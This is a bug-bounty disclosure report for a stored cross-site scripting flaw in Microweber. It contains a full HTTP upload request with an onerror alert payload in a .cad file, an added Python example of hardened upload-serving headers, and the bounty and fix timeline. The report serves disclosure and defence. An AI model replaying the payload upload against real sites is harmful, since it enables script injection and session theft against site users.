Cross-site scripting - Stored via upload ".cad" file in microweber/microweber

Valid

Reported on

Apr 27th 2022


Description

When a user uploads a file with the .cad extension, which is on the upload whitelist, the server stores the .cad file under userfiles/media/default/, where it can be accessed directly. When this file is requested, the server responds without a Content-Type header, so the browser sniffs the body and renders it as Content-Type: text/html, and the file can execute JavaScript.
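As an added example that is not part of this report or of Microweber's code, the Python below models the failure the description names (a response with no Content-Type, which the browser then sniffs) next to a hardened way to serve stored uploads: an explicit allow-list from extension to MIME type, an always-present Content-Type, X-Content-Type-Options: nosniff, and an attachment disposition for anything a browser could render as a document. The extension list, the type table and the simplified `would_render_as_html` browser model are assumptions constructed for this example; the sample body is the one from the report's upload request.

```python
"""Serving user uploads without letting MIME sniffing turn them into HTML.

Added example, not Microweber's code. The allow-list, the type table and the
browser model below are constructed assumptions for illustration.
"""
import os
import re

# Hypothetical upload whitelist modelled on the report: ".cad" is allowed but has
# no browser-renderable type, which is exactly the case that went wrong.
ALLOWED_EXTENSIONS = {"png", "jpg", "pdf", "svg", "cad"}

# Explicit extension -> Content-Type table. Anything not listed is served as
# opaque bytes; the server never omits the header and never lets the browser guess.
CONTENT_TYPES = {
    "png": "image/png",
    "jpg": "image/jpeg",
    "pdf": "application/pdf",
    "svg": "image/svg+xml",          # can carry script: never serve inline
    "cad": "application/octet-stream",
}

# Types a browser renders as a document (and therefore may run script from).
RENDERABLE_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml",
    "text/xml", "application/xml",
}

# Types that are safe to display inline because the browser treats them as data.
INLINE_OK = {"image/png", "image/jpeg", "application/pdf"}

_UNSAFE_NAME_CHARS = re.compile(r"[^A-Za-z0-9._-]")

# Body from the report's request, used here only as the sample stored file.
SAMPLE_UPLOAD = b'<img src=x onerror="alert(window.origin)"/>'


def extension_of(filename):
    """Lower-cased extension without the dot ('' if there is none)."""
    return os.path.splitext(filename)[1].lstrip(".").lower()


def is_allowed(filename):
    """Upload-time check: only whitelisted extensions are stored."""
    return extension_of(filename) in ALLOWED_EXTENSIONS


def response_headers(filename):
    """Headers to serve a stored upload with.

    Rules: always send Content-Type (unknown -> application/octet-stream);
    send nosniff so the browser does not reinterpret the body; serve anything
    that is not a known inline-safe type as an attachment, so a file containing
    "<script>" is downloaded instead of rendered.
    """
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not on the upload whitelist: %r" % ext)
    ctype = CONTENT_TYPES.get(ext, "application/octet-stream")
    # Guard against a renderable type slipping into the table: keep the type
    # (so nosniff is honoured) but force a download.
    inline_ok = ctype in INLINE_OK and ctype not in RENDERABLE_TYPES
    disposition = "inline" if inline_ok else "attachment"
    safe_name = _UNSAFE_NAME_CHARS.sub("_", os.path.basename(filename)) or "download"
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": '%s; filename="%s"' % (disposition, safe_name),
        # Defence in depth: even if something is rendered, no script may run.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def would_render_as_html(headers, body):
    """Deliberately simplified model of browser behaviour (an assumption):
    an attachment is never rendered; with no Content-Type the browser sniffs
    and a body that starts with a tag becomes text/html; otherwise only an
    explicit text/html renders."""
    if headers.get("Content-Disposition", "").startswith("attachment"):
        return False
    ctype = headers.get("Content-Type")
    if ctype is None:
        return body.lstrip().startswith(b"<")
    return ctype.split(";")[0].strip() == "text/html"


if __name__ == "__main__":
    # The reported behaviour: no Content-Type at all, so the .cad body is sniffed.
    print("no headers ->", would_render_as_html({}, SAMPLE_UPLOAD))
    # The hardened response for the same file.
    hardened = response_headers("xss.cad")
    print(hardened)
    print("hardened   ->", would_render_as_html(hardened, SAMPLE_UPLOAD))
```

The point of the explicit table is that a whitelist of extensions is not enough on its own: the download handler must also decide, per extension, what type to declare and whether the browser may display it inline, and it must say so on every response rather than leaving the header out for extensions it does not recognise.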

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------160328176018575625273778825362
Content-Length: 615
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/microweber/admin/content/0/edit
Cookie: laravel_session=VtYsoItyj8nMr4HL6c9jgGhCckyCIvM0KefRFBVP; csrf-token-data=%7B%22value%22%3A%22g3SBhsqNBbpRl3ondmilLAqrPEssVIV9GQCfWH7k%22%2C%22expiry%22%3A1651077488795%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//127.0.0.1/microweber/admin/content/0/edit; mw-back-to-live-edit=true; show-sidebar-layouts=0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="name"

xss.cad
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunk"

0
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunks"

1
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror="alert(window.origin)"/>
-----------------------------160328176018575625273778825362--

PoC Images

Screenshot 1: Upload .cad file
Screenshot 2: Server does not respond with a Content-Type header
Screenshot 3: Access .cad file and the XSS fires

Impact

This vulnerability lets an attacker execute arbitrary JavaScript in the victim's browser: steal the user's cookie, perform HTTP requests, read the content of same-origin pages, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
Peter Ivanov modified the Severity from Critical to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 89c8f5 a month ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1157 has been validated
Nhien.IT
a month ago

Researcher


Hi @maintainer,

Why was this vulnerability reduced to a low level?

Nhien.IT
22 days ago

Researcher


Hi @admin @maintainer,

Can I get CVE for this report?
